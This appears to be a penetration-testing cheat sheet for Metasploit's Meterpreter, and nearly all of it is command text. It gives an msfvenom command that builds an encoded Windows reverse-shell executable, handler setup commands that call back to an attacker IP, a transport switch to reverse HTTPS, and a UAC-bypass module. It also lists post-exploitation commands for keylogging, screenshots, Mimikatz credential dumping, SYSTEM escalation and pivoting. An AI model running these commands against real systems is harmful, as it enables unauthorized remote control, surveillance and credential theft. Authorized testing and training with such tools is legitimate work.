Creating a Session

To create a session, a Meterpreter payload must be executed on the target machine. A meterpreter payload can be handled by exploit/multi/handler.

In order to create a session, first generate and upload a Meterpreter reverse shell payload. Modify $IP and $PORT as needed.

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=$IP LPORT=$PORT -f exe -o x.exe

On the attacker machine, run the following in msfconsole. See advanced for encoding the stager.

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST $IP
set LPORT $PORT
set EXITFUNC thread
set AutoRunScript post/windows/manage/migrate # for windows
run -j # use jobs and jobs -i ID to view background jobs

Use Automigration on Windows!

If meterpreter is embedded into a binary (e.g., with shellter) or injected on stack, then the connection will die when meterpreter finishes. This can be prevented with migration. To do so, run set AutoRunScript post/windows/manage/migrate.

Run the uploaded shell executable on the vulnerable host.

Start-Process x.exe
# or
.\x.exe

The meterpreter session should be created momentarily in the Metasploit console.

Transport

Meterpreter allows an attacker to change the type of traffic used.

meterpreter> transport list
# a list of transport is displayed...
# assuming current transport is reverse_tcp
meterpreter> transport add -t reverse_https -l 192.168.119.131 -p 5555
meterpreter> background
msf> use exploit/multi/handler
msf> set PAYLOAD windows/meterpreter/reverse_https
msf> set LHOST 192.168.119.131
msf> set LPORT 5555
msf> run -j
msf> sessions -i 1
meterpreter> transport next
# session changes transport and exits
msf>
# wait for it...
# new session created
# stage sent
msf> session -i 2
meterpreter> 

Meterpreter Usage

General

  • sysinfo: gather basic info about remote machine
  • shell: launches a shell

File Transfer

  • upload LOCAL REMOTE: upload file to remote machine
  • download REMOTE LOCAL: download file to local machine

Peeping

Note that these command run under the current user. Migrate as necessary.

  • screenshot: captures a screenshot
  • keyscan_start to start keylogging
  • keyscan_dump to dump current keylog results
  • keyscan_stop to stop keylogging

Process Management & Migration

  • ps: list processes
  • migrate PID: migrate to PID given sufficient privileges (target process should have the same privilege or lower as current process)

Post-exploitation Modules

Using a windows UAC bypass as an example (this one works on Falls Creator update at least)

msf> use exploit/windows/local/bypassuac_injection_winsxs
msf> show targets
# 0 -> win x86
# 1 -> win x64
msf> set TARGET 1
msf> set SESSION 1 # needs an existing meterpreter session
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST tun0
msf> set LPORT 4455

Extensions

  • load EXTENSION: load a given extension
  • load powershell: load powershell extension
    • powershell_execute "$PSVersionTable.PSVersion": get PS version
  • load kiwi: load Mimikatz
    • getsystem: try to elavate to SYSTEM from high integrity shell
    • creds_msv: dump MSV credentials

Pivoting

  • portfwd add -l LOCAL -p REMOTE -r REMOTE_IP